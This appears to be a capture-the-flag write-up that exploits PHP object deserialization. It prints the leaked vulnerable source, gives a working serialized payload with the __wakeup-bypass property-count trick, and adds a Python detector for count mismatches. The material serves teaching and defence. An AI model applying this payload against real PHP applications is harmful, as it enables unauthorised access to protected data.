Sensitive file disclosure
Request www.zip and extract the archive. class.php contains the PHP source:
<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    // Runs automatically when an object is restored by unserialize()
    function __wakeup(){
        $this->username = 'guest';
    }
    // Runs when the object is destroyed
    function __destruct(){
        // Loose comparison: the password must equal 100
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        // Strict comparison: the username must be exactly 'admin'
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
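When an object is restored by unserialize(), __wakeup sets the username to guest; the default password is yesyes. When the object is destroyed, the flag is returned if the username is admin and the password is 100.
The source of index.php is: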
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
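It takes the select value from the GET request and unserializes it.
payload:
?select=O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
There is a catch, though: unserialize() automatically calls __wakeup, which resets the username to guest. When the property count declared in the serialized string is greater than the actual number of properties, __wakeup is not called, so change the count to 3:
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}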
Result: flag{4062d09a-d74e-4a74-8a4c-2a65760f98f4}
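
A detection-side view of the count mismatch used above, as an added example that is not part of the original write-up: a small Python parser that walks a PHP-serialized select value and reports every object or array whose declared element count differs from what it actually contains. The function names are hypothetical, and only the N, b, i, d, s, a and O type tags are handled; anything else is reported as malformed.

```python
from urllib.parse import unquote_to_bytes

def _until(buf, pos, ch):
    end = buf.index(ch, pos)          # ValueError if the delimiter is missing
    return buf[pos:end], end + 1

def _value(buf, pos, findings):
    """Walk one PHP-serialized value at pos; return the position after it."""
    tag = buf[pos:pos + 2]
    if tag == b"N;":
        return pos + 2
    if tag in (b"i:", b"b:", b"d:"):
        return _until(buf, pos + 2, b";")[1]
    if tag == b"s:":
        n, pos = _until(buf, pos + 2, b":")
        end = pos + 1 + int(n)        # lengths are byte counts, NULs included
        if int(n) < 0 or buf[pos:pos + 1] != b'"' or buf[end:end + 2] != b'";':
            raise ValueError("bad string")
        return end + 2
    if tag in (b"O:", b"a:"):
        name, pos = b"array", pos + 2
        if tag == b"O:":
            n, pos = _until(buf, pos, b":")
            name = buf[pos + 1:pos + 1 + int(n)]
            pos += int(n) + 3         # skip the quoted class name and colon
        declared, pos = _until(buf, pos, b":")
        if buf[pos:pos + 1] != b"{":
            raise ValueError("missing {")
        pos, actual = pos + 1, 0
        while buf[pos:pos + 1] != b"}":
            pos = _value(buf, pos, findings)   # key / property name
            pos = _value(buf, pos, findings)   # value
            actual += 1
        if actual != int(declared):
            findings.append((name.decode(errors="replace"), int(declared), actual))
        return pos + 1
    raise ValueError("unsupported type tag")

def count_mismatches(raw_param):
    """Return [(class, declared, actual)] for a URL-encoded parameter value."""
    findings = []
    try:
        _value(unquote_to_bytes(raw_param), 0, findings)
    except (ValueError, RecursionError):
        findings.append(("<malformed>", -1, -1))   # unparsable input is also worth a look
    return findings

# The two select values from this write-up (count 2, then count 3).
PLAIN = 'O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}'
BYPASS = PLAIN.replace('"Name":2:', '"Name":3:')
print(count_mismatches(PLAIN), count_mismatches(BYPASS))
```

A non-empty result for a request parameter is a strong signal that the sender is trying to skip __wakeup; the server-side fix is still to stop passing request data to unserialize().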